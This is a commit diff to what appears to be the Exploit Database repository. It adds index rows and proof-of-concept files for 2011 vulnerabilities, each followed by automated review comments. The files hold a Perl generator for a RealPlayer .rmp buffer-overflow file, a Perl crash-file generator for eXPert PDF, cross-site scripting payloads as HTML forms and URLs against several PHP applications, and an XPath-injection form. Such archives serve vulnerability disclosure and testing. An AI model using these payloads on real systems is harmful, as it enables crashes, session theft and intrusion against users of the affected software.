Updated 12_10_2014

Offensive Security 2014-12-10 04:52:01 +00:00
parent 6a7030ba10
commit 92c2a90af7
9 changed files with 257 additions and 0 deletions


@ -31965,3 +31965,11 @@ id,file,description,date,author,platform,type,port
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 'skin' Parameter Cross Site Scripting Vulnerability",2011-03-24,"AutoSec Tools",php,webapps,0
35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
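Review bot: the author field of the 35495 row carries a trailing space (`"Ruben Santamarta "`), which makes that author sort and filter as a separate value from any other entry by the same person; trim it before it lands in the index. The same row is also the only one of the eight new rows that separates product from issue with ` - ` (`WebAccess 7.0 - Multiple Remote ...`); the other seven run the title straight on, so pick one style for the batch. All eight rows are dated March 2011 while the commit is from December 2014, so this is a backfill of old BID entries; a word to that effect in the commit message would save the next reader a diff against the CSV history.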


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47008/info
Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.
An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.
Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35495.zip
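Review bot: this file (35495.txt, per the index row above) is a stub: three sentences copied from the BID and a link to `35495.zip` hosted on exploit-db, with nothing about what the archive contains (advisory text, scripts, captures) and no checksum for it, so a reader of the repository cannot tell whether the archive they download is the intended artifact. Add at least a one-line inventory of the archive's contents and its hash. The description also names two distinct issue classes (information disclosure and remote code execution) without saying which component or request each affects; even a pointer to the section of the archive that covers each would help anyone triaging WebAccess 7.0 installations.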


@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/47039/info
RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
RealPlayer 11.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : RealPlayer v11.0 (.rmp) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Buffer Overflow
# Tested on : Windows XP SP3 Fran.ais
# Target : RealPlayer v11.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# -----------------
# XML version : 1.0 in (Real Metadata Package File)
# <?xml version="1.0"?>
# <embed src="rtsp:// **BUFFER ** " autoplay="whatever" />Null
# -----------------
#START SYSTEM /root@MSdos/ :
# -----------------
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================================|\n";
print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
print " |= [!] Exploit : Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================================|\n";
sleep(2);
print "\n";
# Parameter OverFlow =>
my $kA = "\x41" x 333 ; # A * 333
my $kB = "\x42" x 333 ; # B * 333
my $kC = "\x43" x 333 ; # C * 333
my $buffer = $kA.$kB.$kC ;
my $header =
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
"\x2f\x3e\x00";
# Creating ...
my $kedans = $header ; # |=:: Header & AAA...BBB...CC etc ::=|
open (FILE ,"> Crash.rmp"); # Evil File Here
print FILE $kedans ;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close (FILE);
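Review bot: the `or die` on the `print "\n [+] File successfully created!\n" or die ...` line is attached to the `print` that writes to STDOUT, not to the file operation, and the `open (FILE ,"> Crash.rmp")` two lines earlier is never checked, so a failed open (read-only directory, file in use) still reports `[+] File successfully created!` and produces nothing. Check the open instead, e.g. `open(my $fh, '>', 'Crash.rmp') or die "cannot create Crash.rmp: $!";`, and call `binmode($fh)` before printing, since `$header` contains raw `\x0d` and `\x00` bytes that should not pass through a text-mode handle. Minor: the `# Tested on` line has a mis-encoded character (`Fran.ais`), the `system("title ...")`, `color` and `cls` calls are cmd.exe built-ins that fail silently anywhere else, and the XML shown in the comment block is exactly what the hex string below it spells out, so a plain-text `$header` would be easier to audit than the escaped bytes.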

platforms/php/webapps/35496.txt (Executable file, 27 lines)

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/47014/info
MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="remind">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>
<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
</form>
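Review bot: all three forms carry `name="hack"`, so `document.forms["hack"]` only ever resolves to the first of them, and each form posts `module=users` twice (once in the query string of the `action`, once as a hidden field); if the original PoC relied on a script or button to submit the forms, it is missing from this file, and the duplicate parameter should be noted because the two copies may be read differently by the application. For anyone verifying a fix it would help to state, per form, where in the response the `user_email` or `user_hide` value is echoed back. Also, the file is committed with the executable bit set (`Executable file` in the header) although it is plain text; drop the mode change.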

platforms/php/webapps/35497.txt (Executable file, 10 lines)

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47015/info
GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.
http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert(&#039;XSS1!&#039;)</script>&uniqueId=<script>alert(&#039;XSS2!&#039;)</script>#
http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert(&#039;XSS1!&#039;)</script>&traceLevel=<script>alert(&#039;XSS2!&#039;)</script>#
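Review bot: both PoC URLs store the payload's quotes as HTML entities (`alert(&#039;XSS1!&#039;)`), an artifact of the advisory having been copied from a rendered web page; sent as written, the server receives the literal characters `&#039;`, which is not what the advisory tested. Store the raw apostrophe (or `%27`) so the file reproduces the reported behaviour. It would also help to say which of the two handlers (`CoreViewerInit.js` and `CoreController.js` via `dd:script`) echoes which parameter, since `reportName`, `uniqueId` and `traceLevel` are listed without that mapping. The executable bit on a plain-text file should be dropped here as well.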

platforms/php/webapps/35498.txt (Executable file, 13 lines)

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47017/info
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
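Review bot: the three description sentences appear twice verbatim (the second copy starting at the second `Ripe Website Manager is prone to ...` line) and nothing else is in the file, so the index row's promise of "Cross Site Scripting and Multiple SQL Injection Vulnerabilities" is not backed by a single affected script or parameter name. Remove the duplicate block and add at least the affected request(s) from the referenced BID, otherwise the entry is only a pointer to securityfocus.com. The executable bit on this text file should also be dropped.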


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47027/info
netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
netjukebox 5.25 is vulnerable; other versions may also be affected.
http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
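Review bot: the description says only netjukebox 5.25 is vulnerable, while the index row for 35499 lists `4.01B/5.25`; align the two, or state in this file which versions were actually tested. The PoC URL is the one concrete detail (the `skin` parameter of `message.php` reflected without encoding), and the file should say so in words rather than leaving it to be inferred from the URL-encoded payload.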

platforms/php/webapps/35500.txt (Executable file, 68 lines)

@ -0,0 +1,68 @@
source: http://www.securityfocus.com/bid/47037/info
Family Connections is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
Family Connections 2.3.2 is vulnerable; other versions may also be affected.
<!--
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2
Summary: Family Connections is an open source
content management system. It makes creating a
private, family website easy and fun.
Desc: FCMS suffers from a stored XSS vulnerability
(post-auth) in messageboard.php script thru the
&#039;subject&#039; post parameter. XPath lies in the
/inc/getChat.php script with &#039;users&#039; get parameter with
no args, and post parameter &#039;message&#039;.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko &#039;LiquidWorm&#039; Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2011-5004
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php
22.03.2011
-->
<html>
<title>Family Connections CMS 2.3.2 Stored XSS And XPath Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xpath(){document.forms["xpath"].submit();}
function xss(){document.forms["xss"].submit();}
</script>
<form action="http://FCMS/inc/getChat.php" enctype="application/x-www-form-urlencoded" method="POST" id="xpath">
<input type="hidden" name="message" value="\\&#039;;--\\&#34;;--" /></form>
<a href="javascript: xpath();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XPath!<h3></center></font></b></a>
<form action="http://FCMS/messageboard.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="subject" value=&#039;"><script>alert(1)</script>&#039; />
<input type="hidden" name="post" value="waddup" />
<input type="hidden" name="name" value="1" />
<input type="hidden" name="post_submit" value="Submit" /></form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit XSS!<h3></center></font></b></a>
</body></html>
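Review bot: the `value=` attribute on the `subject` input (`value=&#039;"><script>alert(1)</script>&#039;`) and the apostrophes in the comment block are HTML-entity-encoded where every other attribute uses plain quotes, an artifact of the advisory having passed through an HTML page; restore the literal single quotes so the attribute is actually quoted and the file is valid HTML. The index row for 35500 describes only an HTML-injection issue in `subject`, while this file also carries an XPath-injection PoC against `/inc/getChat.php`; either the index title should reflect both issues or the entry should be split. Minor markup points: both `<h3>` headings are opened twice and never closed (`<h3>...<h3>`), `<title>` sits outside a `<head>`, and `FCMS` in both form actions is a placeholder host that the file should label as such. The executable bit on a plain-text file should be dropped.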

platforms/windows/dos/35502.pl (Executable file, 54 lines)

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/47040/info
eXPert PDF is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Blocked 'vsbatch2pdf.exe' When Generate
# Tested on : Windows XP SP3 Fran?ais
# Target : eXPert PDF Editor v7.0.880.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |=============================================|\n";
print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
print " |= [!] Exploit : Denial of Service Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |=============================================|\n";
sleep(2);
print "\n";
my $junk = "http://"."\x41" x 17425;
open(file , ">", "Kedans.html");
print file $junk;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
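Review bot: same defect as the RealPlayer PoC in this commit: `open(file , ">", "Kedans.html")` is unchecked and the `or die` two lines later belongs to the STDOUT `print`, so a permission error on the output file still prints `[+] File successfully created!`; test the return value of `open` (`or die "cannot create Kedans.html: $!"`). Style: the lowercase bareword filehandle `file` is legal but reads like a variable and collides with a common word; a lexical `my $fh` is clearer. The `# Usage` line describes the manual reproduction step (load the HTML file in vsbatch2pdf.exe and start the generate) but not the observable result, and the `# Impact` line's "Blocked 'vsbatch2pdf.exe' When Generate" should say whether that is a hang or a crash so a triager knows what to expect. The `# Tested on` line has the same mis-encoded character (`Fran?ais`) as the other PoC.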